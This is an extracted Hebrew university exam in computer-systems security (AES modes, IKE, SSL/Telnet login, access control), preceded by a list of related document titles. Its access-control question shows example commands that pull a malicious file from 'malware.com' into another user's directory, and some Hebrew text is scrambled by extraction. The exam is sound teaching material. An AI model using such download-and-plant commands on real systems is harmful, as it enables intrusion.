Exam_A_final

מסמכים קשורים
הגנה - שקפי תרגול

מדריך למרצים ומתרגלים 1

מבוא למדעי המחשב

שאלהIgal : מערכים דו מימדיים רקורסיה:

מערכות הפעלה קורס מס'

PowerPoint Presentation

Microsoft Word - Ass1Bgu2019b_java docx

Office 365 ProPlus בחינם לסטודנטים באוניברסיטת בן גוריון בנגב הוראות סטודנטים באוניברסיטת בן גוריון בנגב יכולים להוריד ולהתקין את חבילת התוכנה Office

קריפטוגרפיה - חלק ג' מאת אופיר בק הקדמה כמנהג הסדרה, לפני שנתקדם לתוכן המאמר, אכריז על הפותר של החידה מהמאמר הקודם: אדווין כהן. הטקסט המוצפן היה - L'a

פקולטה לחינוך מנהל סטודנטים Beit Berl College الكلية االكاديمية بيت بيرل 20/06/2016 י"ד/סיון/תשע"ו ייעוץ וירטואלי הרכבת מערכת )רישום לקורסים( באמצעות

יצוא לחשבשבת תוכן עיניינים הגדרות - חשבונות בנק...2 הגדרות - הגדרות חשבשבת... 3 הגדרות - כרטיסי אשראי... 4 הגדרות - סוגי הכנסה... 5 יצוא לחשבשבת...6 י

מבחן בפיתוח מערכות תוכנה בשפת Java ( )

Slide 1

Microsoft Word - c_SimA_MoedB2005.doc

תאריך פרסום: תאריך הגשה: מבנה נתונים תרגיל 5 )תיאורטי( מרצה ומתרגל אחראים: צחי רוזן, דינה סבטליצקי נהלי הגשת עבודה: -את העבודה יש לה

אוניברסיטת חיפה החוג למדעי המחשב מרצה: שולי וינטנר מתרגלים: נעמה טוויטו, מחמוד שריף מבוא למדעי המחשב סמסטר א' תשע"ב בחינת סיום, מועד א', הנחי

- איך הצלחנו לעקוף את כל מנגנוני ההגנה כנגד מתקפת NTLM Relay מאת מרינה סימקוב וירון זינר, תורגם ע י צפריר גרוסמן הקדמה בעדכונים הקבועים של מיקרוסופט ב

(Microsoft Word - SQL\353\351\345\345\365 \341\361\351\361 \360\372\345\360\351\355 \ doc)

סרגל כלים ל-Outlook או לExplorer- מדריך למשתמש

ex1-bash

Slide 1

הטכניון מכון טכנולוגי לישראל הפקולטה למדעי המחשב הוראות הגשה: ההגשה בזוגות. הוסיפו שמות, ת.ז., אי-מייל, תא אליו יש להחזיר את התרגיל ואת תשובותיכם לתרג

שאלה 2. תכנות ב - CShell

T01-1page

הטכניון מכון טכנולוגי לישראל אלגוריתמים 1 )443432( סמסטר חורף הפקולטה למדעי המחשב תרגול 9 מסלולים קלים ביותר תרגיל APSP - 1 עד כה דנו באלגור

קובץ הבהרות מס' 1 21/07/2019 מכרז פומבי מספר 5/19 למתן שירותי ביקורת פנים לחברת פארק אריאל שרון בע"מ

הוספת קישור לאתר אינטרנט תוכן ממשק בדיקת מטלות...3 איחוד אתרי קורסים...5 סל מחזור... 7 חידושים בפעילויות...8 תצורת קורס: כפתורים... 9 פורומים...10 שיפ

Bitlocker_TC

אוניברסיטת חיפה החוג למדעי המחשב.5.6 מבוא למדעי המחשב סמסטר א' תשע"ז בחינה סופית מועד א', מרצה: שולי וינטנר מתרגלים: סמאח אידריס, ראמי עילבו

<4D F736F F D20FAE5F1F4FA20ECE7E5E5FA20E3F2FA20ECE2E1E920E3E9F1F720FAEEE5F0E5FA20E6E9F8FA20E4F8F6E72E646F63>

תוכנה חופשית מאחורי הקלעים? על סדר היום: קצת על עצמי מה זאת תוכנה חופשית? ההיסטוריה של תוכנה חופשית כיצד תוכנה חופשית משתלבת בשוק התוכנה היתרונות של ת

Microsoft Word - ExamA_Final_Solution.docx

מרצים יקרים, אתר המכללה מאפשר למרצי המכללה להזין את פרטיהם וקורות חייהם. זאת בדומה לאתרים מקבילים של מוסדות אקדמיים בארץ ובעולם. עמודי המרצים נועדו לא

Title

אוניברסיטת חיפה החוג למדעי המחשב מרצה: שולי וינטנר מתרגלים: נעמה טוויטו, מחמוד שריף מבוא למדעי המחשב סמסטר א' תשע"ב בחינת סיום, מועד א', הנחי

שאלהIgal : מערכים דו מימדיים רקורסיה:

משימה תכנית המתרגמת קטעי טקסט לשפה אחרת הקלט: קובץ המכיל את קטעי הטקסט וכן את השפה אליה רוצים לתרגם תרגול מס' 4: המתרגם שימוש במחלקות קיימות תכנות מתק

תכנון אלגוריתמים עבודת בית 4: תכנון אלגוריתמים תאריך הגשה: 02: , בצהריים,תא מספר 66 בקומת כניסה של בניין 003 מתרגל אחראי: אורי 0

WinZIP תוכנה לדחיסת קבצים ספטמבר 2007

דוגמאות שהוצגו בהרצאה 10 בקורס יסודות מערכות פתוחות דוגמה 1 דוגמאות של פונקציות ב- awk שמראות שהעברת פרמטרים של משתנים פשוטים היא by value והעברת פרמט

מבוא למדעי המחשב

Microsoft Word IG Lab - Configure Wireless Router in Windows Vista.docx

מבוא למדעי המחשב - חובלים

שעור 6

People. Partnership. Trust מסלול Free פורטל החינוך מבית U-BTech מסלולים ומחירים חיבור לשירותי Office 365 ללא עלות פורטל התחברות הכולל ממשק למנב"ס ולסי

שימו לב! יש לענות על כל השאלות בתוך טופס הבחינה, מחברות טיוטא הולכות לגריסה. על השאלות יש לענות במקום המיועד אחרי כל שאלה. תאריך הבחינה: שם

הנחיות הורדה ותפעול לספרים דיגיטלים. הוצאת כנרת, זמורה ביתן שמחה להגיש לכם, התלמידים, ספר דיגיטלי. הספרים עצמם הינם בקבצי PDF הניתנים להורדה ללא עלות

ת'' מדריך לבעלי תיבה קיימת במופ ומשתמשים ב Outlook 2003 או doc.2007 לפני שניגש להגדיר את תיבת המייל החדשה, נבצע גיבויי של המיילים ופנקס הכתובות מהחשבו

2013/14 אוניברסיטת חיפה מבוא למדעי מחשב, מעבדה מטרת המעבדה: לתרגל את המעבר מאלגוריתם לקוד C כמה שיותר. הוראות:.1.2 ניתן לעבוד ביחידים או בזוגות. (יש מ

סדנת תכנות ב C/C++

1 תיכון א' לאמנויות-ת"א תאריך הגשה: יומן קריאה /סמסטר א' כיתה ט' לכל תלמידי כיתות ט' לפני שתיגשו למטלות הכתיבה הנכם מתבקשים לקרוא בעיון את פרטי מהלך ה

אוניברסיטת חיפה החוג למדעי המחשב מבוא למדעי המחשב מועד א' סמסטר ב', תשע"ג, משך המבחן: שעתיים וחצי חומר עזר: אסור הנחיות: וודאו כי יש בידיכם

מדריך להתקנת Code Blocks מדריך זה נועד לתאר את תהליך התקנת התוכנה של הקורס "מבוא למחשב שפת C". בקורס נשתמש בתוכנת Code::Blocks עם תוספת )אשף( המתאימה

People. Partnership. Trust שלבי הפרויקט והמסלולים השונים - פלטפורמת "קהילה לומדת" מסלול Free שלבי הפרויקט: חיבור לשירותי Office 365 ללא עלות פורטל התח

Microsoft PowerPoint - meli-iso.ppt

מספר זהות: סמסטר ב' מועד א' תאריך: 11102/4// שעה: 9:22 משך הבחינה: 3 שעות חומר עזר: אין מותר השימוש במחשבון פשוט בחינה בקורס: מבני נתונים מרצה: הדר בי

הסבר על תעודות אבטחה SSL Certificate,איזה Swtich \ Router מחוברים לSwitch בו אתם נמצאים, הסבר על CDP ועל LLDP

תקנון Switc h To Mac 2019

מבחן סוף סמסטר מועד ב 28/10/08 מרצה אחראית: דר שירלי הלוי גינסברג מתרגלים: גלעד קותיאל, גדי אלכסנדרוביץ הוראות: א. בטופס המבחן 6 עמודים (כולל דף זה) ו

הגשה תוך שבוע בשעת התרגול

תרגול 1

מבחן סוף סמסטר מועד א 15/02/08 מרצה אחראית: דר שירלי הלוי גינסברג מתרגלים: גלעד קותיאל, דניאל גנקין הוראות: א. בטופס המבחן 7 עמודים ו 4 דפי נוסחאות. ב

תוכן העניינים: פרק צמצומים ומימושים של פונקציות בוליאניות... 2 צמצומים של פונקציות באמצעות מפת קרנו:...2 שאלות:... 2 תשובות סופיות:... 4 צמצום

שאלהIgal : מערכים דו מימדיים רקורסיה:

תוכן העניינים

Slide 1

תוכנית לימודים להתמחות תכנון ותכנות מערכות הגנת סייבר

מספר נבחן / תשס"ג סמסטר א' מועד א' תאריך: שעה: 13:00 משך הבחינה: 2.5 שעות בחינה בקורס: מבחנים והערכה א' מרצה: ד"ר אבי אללוף חומר עזר

מטלת מנחה (ממ"ן) 11 הקורס: חשבון אינפיניטסימלי II חומר הלימוד למטלה: יחידות 2,1 4 מספר השאלות: 7 משקל המטלה: נקודות סמסטר: ב 2007 מו

Microsoft Word - sync_LG.doc

מטלת סיום שם הקורס: מורי מורים "עברית על הרצף" מוגשת ל- ד"ר האני מוסא תאריך הגשה: מגישה: זייד עביר יסודי ספר בית קחאוש אלפחם אום 1

תרגול מס' 4: המתרגם שימוש במחלקות קיימות מחרוזות, קבצים, וקבלת קלט מהמשתמש

שקופית 1

תרגיל 5-1

תרגול מס' 1

תכנות מונחה עצמים א' – תש"ע

וועדת הלסינקי מרכזית - מטרות ואמצעים

תוכן העניינים

תכנות דינמי פרק 6, סעיפים 1-6, ב- Kleinberg/Tardos סכום חלקי מרחק עריכה הרעיון: במקום להרחיב פתרון חלקי יחיד בכל צעד, נרחיב כמה פתרונות אפשריים וניקח

6 סיבות מדוע הכרחי לקחת אחריות על גיבוי ה Office חשיפת סיבות קריטיות מדוע ארגונים זקוקים לגיבוי נתוני ה Office 365 -

ייבוא וייצוא של קבצי אקסל וטקסט

מבוא למדעי המחשב - חובלים

PowerPoint Presentation

.#8)* '!),$ 217):: '!),$ ,'!8$ !20/

Microsoft Word - tutorial Dynamic Programming _Jun_-05.doc

פקולטה: מחלקה: שם הקורס: קוד הקורס: מדעי הטבע מדעי המחשב ומתמטיקה מתמטיקה בדידה תאריך בחינה: _ 07/07/2015 משך הבחינה: 3 שעות סמ' _ב' מועד

מקביליות

Microsoft Word B

מנהל עסקים תואר ראשון שנה א' שם קורס אנגלית רמת טרום בסיסי א' שם המרצה קוד הקורס 698 מתכונת סמסטריאלי נקודות זכות אנגלית רמת טרום בסיסי ב' סמסטר

תרגיל 1 בקורס תוכנה 1

תורת החישוביות תרגול הכנה לוגיקה ותורת הקבוצות מה יש כאן? בקורס תורת החישוביות נניח ידע בסיסי בתורת הקבוצות ובלוגיקה, והכרות עם מושגים בסיסיים כמו א"ב

בקשה לקבלת הצעות מחיר

הסכם התקשרות שנערך ונחתם ביום חודש שנת 2018 בין: שכתובתו: )להלן: "בעל ההיתר/מבקש ההיתר/ הלקוח"( מצד אחד; ובין: מכון בקרת הבניה הישראלי בע"מ ח.פ

התגוננות בפני כוחות האופל

TLP: White בלמ ס 1 26 מרץ 2019 י"ט אדר ב תשע"ט סימוכין : ב - ס 875- המלצות הגנה בסייבר לקראת פעילות " "OpIsrael רקע בתאריך 7 לאפריל,2019 ובימים שלפניו

שם הקורס: סוג הקורס: שנה"ל: דרישות קדם: מרצה/ים: אסיסטנט/ עוזר/ת הוראה: שעות קבלה: סילבוס ביה"ס לעיצוב וחדשנות - תואר 1 שרטוט אדריכלי 2- טכנולוגיות פנ

?????? ???? rtf

Titre du document en police Sodexo

תאריך עדכון:

אוניברסיטת בן-גוריון המחלקה למדעי המחשב בוחן במבנים בדידים וקומבינטוריקה פרופ' מתיא כ"ץ, ד"ר עופר נימן, ד"ר סטוארט סמית, ד"ר נתן רובין, גב'

תמליל:

הטכניון- מכוןטכנולוגילישראל הפקולטהלמדעיהמחשב מבחןבהגנהבמערכותמתוכנתות 236350 סמסטרחורף, תשע"א מועדא', 14.2.2011 מרצהאחראית: ד"רשרהביתן מתרגל: אלעדגדרון משךהמבחן: שלוששעות. במבחן 4 שאלות. ענועלכולן. במבחןזה 6 עמודים, כוללעמודזה. וודאושכלהדפיםנמצאים. מותרלהשתמשבכלחומרעזרלאאלקטרוניובמחשבון. הקדישואת 10 הדקותהראשונותלקריאתכלהשאלותוהבנתן. ענותשובותברורותככלהאפשר. נמקואתכלתשובותיכם. כתבובצורהמסודרתונקייהובכתבברור. תשובותלאברורותלאתיבדקנה. בהצלחה! 1

שאלה - 1 AESואופני תפעול (25 נק') הוחלט לשנות את AES ע"י החלפת פעולת ה- MixColumns בפעולת ShiftColumns הדומה לפעולת ה- ShiftRows אך פועלת על עמודות. בדומה לפעולת ה- ShiftRows פעולת ה- ShiftColumns משאירה את בתים), מבצעת הזזה ציקלית של בית השמאלית ביותר בטבלה כפי שהיא (הזזה ציקלית של 0 העמודה אחד למטה על העמודה השניה, הזזה ציקלית של שני בתים למטה על העמודה השלישית והזזה ציקלית למטה על העמודה הרביעית. האיור הבא ממחיש כיצד פועלת פעולת ה- ShiftColumns של שלושה בתים על המצב: א. הצופן החדש לעמידות הצופן המקורי כנגד התקפת.chosen-plaintext attack השוו בין עמידות פחות בטוח, תארו התקפת chosen-plaintext כנגדו, ציינו מהו מספר הזוגות (P,C) אם הצופן החדש הדרוש עבור ההתקפה וציינו מה סיבוכיות המקום והזמן של ההתקפה. אם הבטיחות כנגד ההתקפה לא השתנתה הסבירו מדוע. הסעיפים הבאים אינם קשורים לסעיף א' ב. אופן התפעול (Number Mode) NBR הוא אופן תפעול המוגדר באופן הבא: C i =M i E k (i) בתרשים נראה הדבר כך: M 1 M 2 M n 1 2 n E E... E C 1 C 2 C n של Number Mode על פני.ECB תאר שני יתרונות 2

ג. ה. למתרגל ולמרצה בקורס "הגנה במערכות מתוכנתות" מפתח סודי משותף המשמש להצפנה ולפענוח של הודעות. הם משתמשים בו ע"מ להצפין ביניהם הודעות באמצעות צופן סימטרי בטוח באופן תפעול.NBR לפני מועד א' בקורס "הגנה במערכות מתוכנתות" שלח המתרגל עותק מוצפן של המבחן למרצה. לפני מועד ב', פרסם המתרגל את מועד א' באתר הקורס ושלח למרצה עותק מוצפן של מועד ב' שאורכו כאורך מועד א'. תארו כיצד סטודנט הלומד למועד ב' ומאזין לתקשורת המוצפנת שעוברת בין המתרגל למרצה יכול ללמוד את תוכן המבחן (מועד ב') לפני פרסומו. הציעו שינוי קל ל- Mode Number כך שהמתרגל והמרצה יוכלו להעביר ביניהם עותק מוצפן ב- NBR של מועד ב' בלי לחשוש שתוכנו ייחשף ע"י הסטודנטים. המתרגל והמרצה מעוניינים להמשיך להשתמש בצופן ובמפתח היחיד בהם השתמשו לצורך הצפנת מועד א'. אסור שהשינוי שלכם יכלול פעולות הצפנה או xor נוספות לאלה שבשימוש בהפעלה של Number Mode המקורי ועליכם לשמר את היתרונות של NBR על פני.ECB המתרגל הציע להוסיף (Message Authentication Code) MAC להודעות המועברות בינו ובין המרצה. הוא הציע להשתמש ב- NBR-MAC המוגדר באופן דומה ל- CBC-MAC כפי שנלמד בכיתה. כלומר, לצורך חישוב ה- MAC המרצה והמתרגל יחשבו את הצפנת ההודעה M תחת מפתח k (השונה מהמפתח המשמש להצפנה) וישתמשו ב- Cבתור n ה- MAC. חוו דעתכם על הצעת המתרגל. שאלה - 2 IKE 25) נק') א. ב. ראינו בכיתה את חשיבות מחרוזות ה- CKY בהגנה נגד DOS ב- mainmode.ike הסבירו בקצרה כיצד ה- CKYמונע את ההתקפה ומדוע ב- aggressivemode IKEההגנה לא קיימת. הוחלט לשנות את באופנים הבאים. ניתן להניח שהתוקף יכול ליצור קשר עם השרת בלי לסיים את ההתקשרות. כמו כן השרת לא יאפשר התחברות מאותו כתובת IPיותר מפעם בשעה אם מה- IP הזה ניסו ליצור התחברות ולא סיימו אותה. עבור כל הצעה ל- ענו: האם עדיין יש חסינות ל- DOSב- mainmode?ike נמקו. =h ) =h ) =h ) =h ) hהיא פונקצית תמצות קריפטוגרפית בטוחה הידועה לכולם. הן, כתובות ה- IPשל השרת והלקוח. הוא רשימת ה- SAשהיוזם שלח בהודעה הראשונה. - מספר סודי באורך 256 -ביט ששמור בשרת וידוע רק לו. - מספר אקראי בן 256 -ביט שהשרת מגריל בכל הפעלה של הפרוטוקול. - מפתח ה- DHשל השרת. בכל הפעלה של הפרוטוקול מוגרל חדש. (1 (2 (3 (4 כאשר: 3

הסעיפים הבאים בשאלה זו אינם תלויים זה בזה ובסעיפים הקודמים. ג. הוחלט לשנות את אופן חישוב מפתחות Diffie-Hellmanבפרוטוקול.IKE במקום שכל צד יבחר את באופן אקראי וישלח את המפתח הפומבי יחושב כך: ) כאשר: hהיא פונקצית תמצות קריפטוגרפית בטוחה הידועה לכולם. - מספר סודי באורך 256 -ביט ששמור מקומית וידוע רק למחשב המקומי. CKY ה- CKY של המחשב הנוכחי, ניתן להניח שהוא שונה בכל הפעלה של הפרוטוקול. הסבירו מדוע הגרסה החדשה של IKE לא בטוחה כמו הגרסה הרגילה של IKE בה ו- הם ערכים אקראיים שמוגרלים ע"י כל צ הוחלט לשנות את אופן חישוב h hו- h hבצורה הבאה: h h = ) h h = ) ובנוסף הוחלט לשנות את אופן גזירת המפתחות בפאזה הראשונה: SKEYID =PRF ) g CKY CKY 0) SKEYID =PRF ) SKEYID g CKY CKY 1) SKEYID =PRF ) SKEYID g CKY CKY 2) האם הגרסה החדשה של IKEבטוחה כמו הגרסה הרגילה של?IKE אם כן הסבירו מדוע, אחרת הדגימו התקפה שהגרסה החדשה חשופה אליה, והמקורית לא. הבחינו בתשובתכם בין אימות עם חתימות לאימות עם סוד משותף ובין mode-לmain mode.aggressive 4

שאלה - 3 בקרת כניסה (25 נק') שרת ה- Web של חברת,www.matchme.com,MatchMe מספק למשתמשיו גישה אל שירות ההכרויות שאותו מספקת החברה. כאשר משתמש נרשם לשירות הוא מקבל שם משתמש וסיסמה, בעזרתם הוא מזדהה ללא אימות הלקוח. נעשית באמצעות SSL הגישה אל שרתי MatchMe מול השרת שמאמת את זהותו. המשתמש ניגש בעזרת הדפדפן שלו לשרת,MatchMe ולאחר הקמת ה- session SSL מורץ פרוטוקול בקרת הכניסה Telnet Authentication שראינו בכיתה. לאחר שהמשתמש מזדהה, נמסרים לו מספרי טלפון של משתמשי MatchMeשמעוניינים להכיר אותו. הסבירו מדוע מאובטח פרוטוקול בקרת הכניסה באמצעות?SSL א. הסבירו כיצד מוודא הדפדפן את הסרטיפיקט של שרת.MatchMe בין היתר צריך ההסבר לתאר גם ב. כיצד הדפדפן מוודא כי הסרטיפיקט של MatchMeהונפק ע"י CAאמין. למדנו כי פרוטוקול בקרת הכניסה של (Telnet Authentication) Telnet חשוף להתקפת שידור חוזר. ג. נמקו. חשוף להתקפת שידור חוזר? האם גם פרוטוקול בקרת הכניסה לשרתי MatchMe רחל עובדת בחברת ההיי-טק.WeRTheBest לחברה מספר גדול של שרתים פנימיים, שהגישה לכולם נעשית באמצעות.SSL גם כאן המשתמש ניגש לשרת הפנימי באמצעות הדפדפן, ולאחר הקמת ה- SSL,session מורץ פרוטוקול בקרת הכניסה.Telnet Autentication מכיוון שהשרתים פנימיים, חברת WeRTheBest הקימה CA פנימי, שמנפיק סרטיפיקטים (בפורמט סטנדרטי (X509v3 לשרתים הפנימיים. הדפדפנים במחשבי החברה (ניידים ונייחים) מפסיקים פתיחת SSL Session במידה ואימות הסרטיפיקט שמציג השרת נכשל. בנוסף, נתון כי כל הגישות לאינטרנט מהחברה עוברות דרך שרת.proxy ה. ו. הסבירו כיצד מוודא הדפדפן את הסרטיפיקט של השרתים הפנימיים בהינתן שאימות השרת מצליח. הסבירו כיצד דואגת חברת WeRTheBestלכך ה- CAהפנימי שלה יוכר כמהימן ע"י הדפדפן. רחל משתמשת בשירותיה של חברת.MatchMe לואיזה, מנהלת הרשת של חברת,WeRTheBest רשומה כבר זמן רב לשירות ואף משתמש איננו פונה אליה. יום בהיר אחד החליטה לנצל את תפקידה בכדי להשיג את מספרי הטלפון של המשתמשים (הרבים) שפנו אל רחל. הסבר כיצד יכולה לואיזה להשיג את מספרי הטלפון? תארו כיצד יכולה חברת MatchMeלפתור את הבעיה. 5

שאלה - 4 בקרת גישה (25 נק') הפקולטה למדעי המינהל שבאוניברסיטת חלם מספקת לסטודנטים שלה שירותי תקשורת לאינטרנט, וגובה מהם תשלום, לפי זמן הגלישה אותו ניצלו. הפקולטה למינהל מאפשרת לסטונדטים לטעון קבצים לכתובות באינטרנט upload),(file ולהוריד קבצים מכתובות באינטרנט download).(file כל משתמש יכול לטעון קבצים לאינטרנט, ולהוריד קבצים מהאינטרנט. הגישה לאינטרנט נעשית באמצעות תהליך נקרא intgwשמופעל בצורה הבאה: intgw f file u url d < up down > כאשר url היא כתובת האינטרנט של הקובץ שיטען אל/מהאינטרנט, file מכיל את כתובת הקובץ המקומי, ו- up או down מציינים האם יתבצע uploadאו.download כל משתמש יכול לטעון קבצים מ/אל האינטרנט אל/מ ה- directory home שלו. אם כיוון הטעינה הוא, down והקובץ file כבר קיים בספריה, הקובץ הקיים ימחק (פעולת,(delete ויווצר קובץ file חדש (פעולת,(create שיכיל את הקובץ שנטען מהאינטרנט. אם נעשה נסיון לבצע create לקובץ שכבר קיים, מתקבלת שגיאת מערכת, ותהליך ההורדה נכשל. בנוסף קיים קובץ מיוחד,/logs/connection_log שמכיל את זמני תחילת וסיום החיבור לאינטרנט של כל אחד מהמשתמשים. intgw רושם ל- connection_log את התאריך והשעה בתחילת ובסיום כל העלאת/הורדת קובץ. אחת לחודש מריץ מנהל המערכת (שיש לו הרשאות (root תכנית שמחייבת את חשבונות הבנק של המשתמשים, ולאחר מכן מוחקת (delete) את הקובץ connection_log וכותבת אותו מחדש.(create) בקרת הגישה הממומשת במערכת היא מסוג DAC ה. אוביקטים שלהם מוקצים ההרשאות הם ספריות וקבצים. אוביקטים חדשים שנוצרים מקבלים בתור ברירת מחדל הרשאות זהות לאילו של הספריה בה הם נוצרו. לכל משתמש יש הרשאות גישה מלאות לספרית הבית שלו (ספרית הבית של rootהיא /), ואין כלל הרשאות גישה לספריית הבית של משתמשים אחרים. למשתמש rootגישה מלאה לכל התיקיות. למשתמשים שאינם root יש אך ורק הרשאת קריאה read) ל)./logs- א. בנו את מטריצת בקרת הגישה שמממשת את מערכת בקרת הגישה המתוארת. יש להשתמש בנתינים אהוד, שרה ו- root, באוביקטים /logs, ~sara ו- ehud ~ (התיקייה u~, היא תיקיית הבית של המשתמש,(u ובהרשאות.read, write, delete, create הסטודנט אהוד החליט לנסות להחדיר תוכנה זדונית לספריות של עמיתיו הסטודנטים שאותם איננו מחבב. תחילה ניסה להריץ את הפקודה הבאה: intgw f ~ehud/hacker_handbook.txt u malware.com/hacker_ hand_book.txt d down שעבדה כצפוי. ע"י ניסוי וטעייה מצא שב- intgwקיימת נקודת תורפה שאפשרה לו לכתוב אפליקציה זדונית לספריה של שרה ע"י ביצוע הפקודה: intgw f ~sara/very_neat_application u malware.com/sus d down מאחר ואהוד הוא hackerמתחיל, הוא לא הצליח לחדור לחשבונות של משתמשים אחרים רק תוך שימוש בחשבון שלו (ולכן גם עם ההרשאות שלו). ולכן הצליח לעבוד 6

ב. ג. תארו מה יכולה להיות הבעיה במימוש האפליקציה.intgw הנחיות: הניחו כי ההרשאות במטריצת בקרת הגישה מוגדרות נכון, וגם נאכפות נכון. 1. בתשובתכם התייחסו לנקודות הבאות: 2. תחת אילו הרשאות רץ התהליך intgwבנקודות הזמן השונות? i. האם התהליך מפר את אחד מעקרונות התכנות הבטוח שנלמדו בהרצאה? מהו העקרון?.ii במהלך ניסיונותיו בילה הסטודנט אהוד שעות רבות בהורדת קבצים מהאינטרנט בחודש הקודם. לאחר שהתמחה בטעינת תכנה זדונית לספריות של עמיתיו, הבין כי נקודת התורפה במימוש של intgwמאפשרת לו גם להימנע מחיוב חשבונו עבור שעות העבודה באינטרנט. הראו כיצד אהוד עושה זאת. תארו פתרון אפשרי לבעיות שתוארו בסעיפים ב ו-ג ונמקו מדוע הוא אכן פותר אותה. 7